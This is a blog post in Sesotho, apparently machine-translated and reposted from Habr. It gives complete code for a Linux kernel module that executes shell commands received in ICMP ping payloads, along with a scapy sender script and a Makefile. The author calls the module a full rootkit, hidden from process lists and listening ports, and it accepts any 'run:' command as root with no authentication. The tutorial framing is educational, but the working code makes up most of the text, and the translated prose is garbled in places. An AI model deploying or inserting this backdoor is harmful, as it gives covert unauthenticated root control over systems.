ProHoster > Blog > Tsamaiso > Khetla ea nyutlelie holim'a ICMP

Khetla ea nyutlelie holim'a ICMP

Khetla ea nyutlelie holim'a ICMP

TL; DR: Ke ngola kernel module e tla bala litaelo tse tsoang ho ICMP payload le ho li phethahatsa ho seva le haeba SSH ea hau e senyeha. Bakeng sa ba hlokang mamello ka ho fetisisa, khoutu eohle e github.

Tlhokomeliso! Baetsi ba mananeo a C ba nang le phihlelo ba kotsing ea ho lla ha mali! Mohlomong nka ba ke fositse ka mantsoe, empa ho nyatsuoa hofe kapa hofe hoa amoheleha. Poso e etselitsoe ba nang le mohopolo o thata haholo oa C programming mme ba batla ho sheba ka hare ho Linux.

Litlhalosong tsa ka tsa pele sehlooho e boletse SoftEther VPN, e ka etsisang mekhoa e meng ea "kamehla", haholo-holo HTTPS, ICMP esita le DNS. Nka inahanela feela ea pele ea bona e sebetsa, kaha ke tloaelane haholo le HTTP(S), mme ke ile ka tlameha ho ithuta ho tsamaisa ICMP le DNS.

Khetla ea nyutlelie holim'a ICMP

Ee, ka 2020 ke ithutile hore o ka kenya moputso o sa reroang ka har'a lipakete tsa ICMP. Empa ho molemo ho lieha ho feta pele! 'Me kaha ho na le ntho e ka etsoang ka eona, joale e lokela ho etsoa. Kaha bophelong ba ka ba letsatsi le letsatsi ke sebelisa mohala oa taelo hangata, ho kenyeletsoa ka SSH, mohopolo oa khetla ea ICMP o ile oa fihla kelellong ea ka pele. 'Me e le ho bokella bingo e feletseng ea bullshield, ke ile ka etsa qeto ea ho e ngola e le mojule oa Linux ka puo eo ke nang le maikutlo a thata ka eona. Khetla e joalo e ke ke ea bonahala lethathamong la lits'ebetso, o ka e kenya ka har'a kernel mme e ke ke ea ba sistimi ea faele, u ke ke ua bona letho le belaetsang lethathamong la likou tse mamelang. Mabapi le bokhoni ba eona, ena ke rootkit e feletseng, empa ke tšepa ho e ntlafatsa le ho e sebelisa e le khetla ea khetho ea ho qetela ha Karolelano ea Moroalo e phahame haholo ho kena ka SSH le ho phethahatsa bonyane. echo i > /proc/sysrq-triggerho khutlisetsa phihlello ntle le ho qala bocha.

Re nka mohlophisi oa mongolo, litsebo tsa mantlha tsa mananeo ho Python le C, Google le mochine oa sebele eo u sa tsotelleng ho e beha tlas'a thipa haeba ntho e 'ngoe le e' ngoe e robeha (ho ikhethela - VirtualBox / KVM / joalo-joalo) 'me re tsamaee!

Lehlakore la moreki

Ho 'na ho ne ho bonahala eka bakeng sa karolo ea bareki ke tla tlameha ho ngola sengoloa se nang le mela e ka bang 80, empa ho na le batho ba mosa ba nketselitseng eona. mesebetsi yohle. Khoutu e ile ea bonahala e le bonolo ka mokhoa o sa lebelloang, e lumellana le mela e 10 ea bohlokoa:

import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    exit(0)

p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
    p.show()

Script e nka likhang tse peli, aterese le mojaro oa moputso. Pele o romela, moputso o etelloa pele ke senotlolo run:, re tla e hloka ho qhelela liphutheloana tse nang le meroalo e sa reroang.

Kernel e hloka litokelo tsa ho etsa liphutheloana, kahoo script e tla tlameha ho tsamaisoa e le superuser. Se ke oa lebala ho fana ka tumello ea ts'ebetso le ho kenya scapy ka boeona. Debian e na le sephutheloana se bitsoang python3-scapy. Hona joale o ka hlahloba hore na tsohle li sebetsa joang.

Ho matha le ho ntša taelo
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!

Sena ke seo se shebahalang ka sona ho motho ea sniffer
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1] [Response time: 19.094 ms] Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

^C2 packets captured

Lekhetho ka har'a sephutheloana sa karabo ha se fetohe.

Module oa kernel

Ho aha mochini o sebetsang oa Debian o tla hloka bonyane make и linux-headers-amd64, tse ling kaofela li tla tla ka mokhoa oa ho itšetleha. Nke ke ka fana ka khoutu eohle sengolong; u ka e kopanya ho Github.

Ho seta hook

Ho qala, re hloka mesebetsi e 'meli ho kenya module le ho e laolla. Mosebetsi oa ho laolla ha o hlokehe, empa joale rmmod e ke ke ea sebetsa; module e tla theoloa feela ha e tingoa.

#include <linux/module.h>
#include <linux/netfilter_ipv4.h>

static struct nf_hook_ops nfho;

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;
  nfho.hooknum = NF_INET_PRE_ROUTING;
  nfho.pf = PF_INET;
  nfho.priority = NF_IP_PRI_FIRST;
  nf_register_net_hook(&init_net, &nfho);
  return 0;
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

Ho etsahalang mona:

  1. Lifaele tse peli tsa lihlooho li huloa ho sebelisa module ka boeona le netfilter.
  2. Lits'ebetso tsohle li kena ka har'a netfilter, u ka beha lihakisi ho eona. Ho etsa sena, o hloka ho phatlalatsa sebopeho seo hook e tla hlophisoa ho sona. Ntho ea bohlokoa ka ho fetisisa ke ho hlalosa mosebetsi o tla etsoa e le hook: nfho.hook = icmp_cmd_executor; Ke tla fihla tšebetsong ka boyona hamorao.
    Ebe ke beha nako ea ho sebetsa bakeng sa sephutheloana: NF_INET_PRE_ROUTING e hlalosa ho sebetsa sephutheloana ha se qala ho hlaha kernel. E ka sebelisoa NF_INET_POST_ROUTING ho sebetsa sephutheloana ha se tsoa kernel.
    Ke beha filthara ho IPv4: nfho.pf = PF_INET;.
    Ke beha hook ea ka pele: nfho.priority = NF_IP_PRI_FIRST;
    'Me ke ngolisa sebopeho sa data e le hook ea sebele: nf_register_net_hook(&init_net, &nfho);
  3. Mosebetsi oa ho qetela o tlosa hook.
  4. Laesense e bonts'itsoe ka ho hlaka e le hore motho ea bokellang a se ke a tletleba.
  5. Mesebetsi module_init() и module_exit() seta mesebetsi e meng ho qala le ho emisa mojule.

Ho khutlisa mojaro oa moputso

Joale re hloka ho hula mojaro oa moputso, ona e bile mosebetsi o boima ka ho fetisisa. Kernel ha e na mesebetsi e hahelletsoeng ka har'a ho sebetsa ka meroalo e lefang; o ka bapisa lihlooho tsa liprothokholo tsa boemo bo holimo feela.

#include <linux/ip.h>
#include <linux/icmp.h>

#define MAX_CMD_LEN 1976

char cmd_string[MAX_CMD_LEN];

struct work_struct my_work;

DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

  user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
  tail = skb_tail_pointer(skb);

  j = 0;
  for (i = user_data; i != tail; ++i) {
    char c = *(char *)i;

    cmd_string[j] = c;

    j++;

    if (c == '')
      break;

    if (j == MAX_CMD_LEN) {
      cmd_string[j] = '';
      break;
    }

  }

  if (strncmp(cmd_string, "run:", 4) != 0) {
    return NF_ACCEPT;
  } else {
    for (j = 0; j <= sizeof(cmd_string)/sizeof(cmd_string[0])-4; j++) {
      cmd_string[j] = cmd_string[j+4];
      if (cmd_string[j] == '')
	break;
    }
  }

  schedule_work(&my_work);

  return NF_ACCEPT;
}

Ho etsahalang:

  1. Ke ile ka tlameha ho kenyelletsa lifaele tse ling tsa lihlooho, lekhetlong lena ho laola lihlooho tsa IP le ICMP.
  2. Ke beha boholo ba bolelele ba mohala: #define MAX_CMD_LEN 1976. Ke hobane'ng ha hantle-ntle see? Hobane moqapi oa tletleba ka eona! Ba se ba ntse ba khothalelitse ho 'na hore ke hloka ho utloisisa stack le qubu, ka letsatsi le leng ke tla etsa sena mme mohlomong le ho lokisa khoutu. Hang-hang ke seta mola o tla ba le taelo: char cmd_string[MAX_CMD_LEN];. E lokela ho bonahala mesebetsing eohle; Ke tla bua ka sena ka botlalo serapeng sa 9.
  3. Joale re hloka ho qala (struct work_struct my_work;) theha le ho e hokahanya le mosebetsi o mong (DECLARE_WORK(my_work, work_handler);). Ke tla boela ke bue ka hore na ke hobane'ng ha sena se hlokahala serapeng sa borobong.
  4. Hona joale ke phatlalatsa mosebetsi, e tla ba hook. Mofuta le likhang tse amoheloang li laeloa ke netfilter, re thahasella feela skb. Ena ke socket buffer, sebopeho sa data sa mantlha se nang le tlhaiso-leseling eohle e fumanehang ka pakete.
  5. Hore ts'ebetso e sebetse, o tla hloka meaho e 'meli le mefuta e mengata, ho kenyeletsoa li-iterator tse peli. 
      struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;
  6. Re ka qala ka logic. E le hore mojule o sebetse, ha ho na lipakete tse ling ntle le ICMP Echo tse hlokahalang, kahoo re arola buffer ka ho sebelisa mesebetsi e hahiloeng le ho lahla lipakete tsohle tseo e seng tsa ICMP le tseo e seng tsa Echo. Kgutla NF_ACCEPT ho bolela ho amoheloa ha sephutheloana, empa u ka boela ua theola liphutheloana ka ho khutla NF_DROP. 
      iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

    Ha ke so leke se tla etsahala ntle le ho sheba lihlooho tsa IP. Tsebo ea ka e fokolang ea C e mpolella hore ntle le licheke tse eketsehileng, ho na le ntho e mpe e tla etsahala. Ke tla thaba ha o ka nthibela ho sena!

  7. Kaha joale sephutheloana ke sa mofuta o nepahetseng oo u o hlokang, o ka ntša data. Ntle le ts'ebetso e hahelletsoeng, u tlameha ho qala ka ho fumana pointer ho qala ha moputso. Sena se etsoa sebakeng se le seng, ho hlokahala hore u nke pointer qalong ea hlooho ea ICMP ebe u e isa boholo ba hlooho ena. Ntho e 'ngoe le e' ngoe e sebelisa sebopeho icmph: user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
    Qetello ea hlooho e tlameha ho ts'oana le pheletso ea mojaro oa moputso ho skb, ka hona re e fumana re sebelisa mekhoa ea nyutlelie ho tsoa mohahong o lumellanang le ona: tail = skb_tail_pointer(skb);.

    Khetla ea nyutlelie holim'a ICMP

    Setšoantšo se utsuitsoe ho tloha mona, o ka bala ho eketsehileng ka socket buffer.

  8. Ha u se u e-na le litsupa ho qala le qetellong, u ka kopitsa data ka khoele cmd_string, e hlahlobe bakeng sa boteng ba sehlongwapele run: 'me, ebang u lahle sephutheloana haeba se le sieo, kapa u ngole mola hape, u tlose sehlongoapele sena.
  9. Ke eona, joale o ka letsetsa motho e mong ea sebetsang: schedule_work(&my_work);. Kaha ho ke ke ha khoneha ho fetisa parameter pitsong e joalo, mohala o nang le taelo o tlameha ho ba oa lefats'e. schedule_work() e tla beha ts'ebetso e amanang le sebopeho se fetisitsoeng mokolokong o akaretsang oa kemiso ea mosebetsi mme e phethe, e u lumellang hore u se ke ua emela hore taelo e phethe. Sena sea hlokahala hobane hook e tlameha ho potlaka haholo. Ho seng joalo, khetho ea hau ke hore ha ho letho le tla qala kapa u tla fumana tšabo ea kernel. Ho lieha ho tšoana le lefu!
  10. Ke sona seo, o ka amohela sephutheloana ka poelo e ts'oanang.

Ho letsetsa lenaneo sebakeng sa mosebelisi

Mosebetsi ona ke oona o utloisisoang ka ho fetisisa. Lebitso la eona le ile la fuoa DECLARE_WORK(), mofuta le likhang tse amohelehang ha li thahaselle. Re nka mola ka taelo ebe re o fetisetsa ka ho feletseng ho khetla. A ke a sebetsane le ho qhekella, ho batla li-binary le tse ling tsohle.

static void work_handler(struct work_struct * work)
{
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

  1. Beha likhang hore e be letoto la likhoele argv[]. Ke tla nka hore motho e mong le e mong oa tseba hore mananeo a hlile a etsoa ka tsela ena, eseng joalo ka mola o tsoelang pele o nang le libaka.
  2. Beha maemo a fapaneng a tikoloho. Ke kentse PATH feela ka litsela tse fokolang, ka tšepo ea hore kaofela li se li kopantsoe /bin с /usr/bin и /sbin с /usr/sbin. Litsela tse ling ha li na taba hangata.
  3. Ke qetile, ha re e etseng! Mosebetsi oa kernel call_usermodehelper() e amohela ho kena. tsela e eang ho binary, letoto la likhang, letoto la mefuta-futa ea tikoloho. Mona ke boetse ke nahana hore motho e mong le e mong o utloisisa moelelo oa ho fetisa tsela ea faele e ka phethisoang e le khang e arohaneng, empa u ka botsa. Khang ea ho qetela e totobatsa hore na ho emela hore ts'ebetso e phethe (UMH_WAIT_PROC), ts'ebetso e qala (UMH_WAIT_EXEC) kapa u se ke ua ema ho hang (UMH_NO_WAIT). Ho na le tse ling hape UMH_KILLABLE, ha kea e sheba.

Kopano

Kopano ea li-module tsa kernel e etsoa ka kernel make-framework. Bitsetsoa make ka har'a buka e khethehileng e hokahaneng le mofuta oa kernel (e hlalositsoeng mona: KERNELDIR:=/lib/modules/$(shell uname -r)/build), mme sebaka sa mojule se fetisetsoa ho feto-fetoha M litsekisanong. icmpshell.ko le lipehelo tse hloekileng li sebelisa moralo ona ka botlalo. IN obj-m e bonts'a faele ea ntho e tla fetoloa mojule. Syntax e fetolang main.o в icmpshell.o (icmpshell-objs = main.o) ha e shebahale e utloahala ho 'na, empa ho be joalo.

KERNELDIR:=/lib/modules/$(shell uname -r)/build

obj-m = icmpshell.o
icmpshell-objs = main.o

all: icmpshell.ko

icmpshell.ko: main.c
make -C $(KERNELDIR) M=$(PWD) modules

clean:
make -C $(KERNELDIR) M=$(PWD) clean

Re bokella: make. E ea kenya: insmod icmpshell.ko. O qetile, o ka hlahloba: sudo ./send.py 45.11.26.232 "date > /tmp/test". Haeba u na le faele mochining oa hau /tmp/test 'me e na le letsatsi leo kopo e rometsoeng ka lona, ​​​​ho bolelang hore u entse ntho e 'ngoe le e' ngoe hantle 'me ke entse tsohle hantle.

fihlela qeto e

Phihlelo ea ka ea pele ka nts'etsopele ea nyutlelie e ne e le bonolo ho feta kamoo ke neng ke lebeletse. Esita le ntle le phihlelo e ntseng e tsoela pele ho C, e lebisang tlhokomelo ho litlhahiso tsa moqapi le liphetho tsa Google, ke ile ka khona ho ngola mochine o sebetsang 'me ka ikutloa joaloka kernel hacker,' me ka nako e ts'oanang ke le ngoana oa script. Ho feta moo, ke ile ka ea seteisheneng sa Kernel Newbies, moo ke ileng ka bolelloa hore ke se sebelise schedule_work() sebakeng sa ho bitsa call_usermodehelper() ka hare ho hook ka boeona 'me a mo hlabisa lihlong, ka nepo a belaella scam. Mela e lekholo ea khoutu e ntefisitse hoo e ka bang beke ea tsoelo-pele nakong ea ka ea mahala. Phihlelo e atlehileng e ileng ea senya tšōmo ea ka mabapi le ho rarahana ho hoholo ha nts'etsopele ea sistimi.

Haeba motho a lumela ho etsa tlhahlobo ea khoutu ho Github, ke tla leboha. Ke na le bonnete ba hore ke entse liphoso tse ngata tse hlokang kelello, haholo ha ke sebetsa ka likhoele.

Khetla ea nyutlelie holim'a ICMP

Source: www.habr.com

Eketsa ka tlhaloso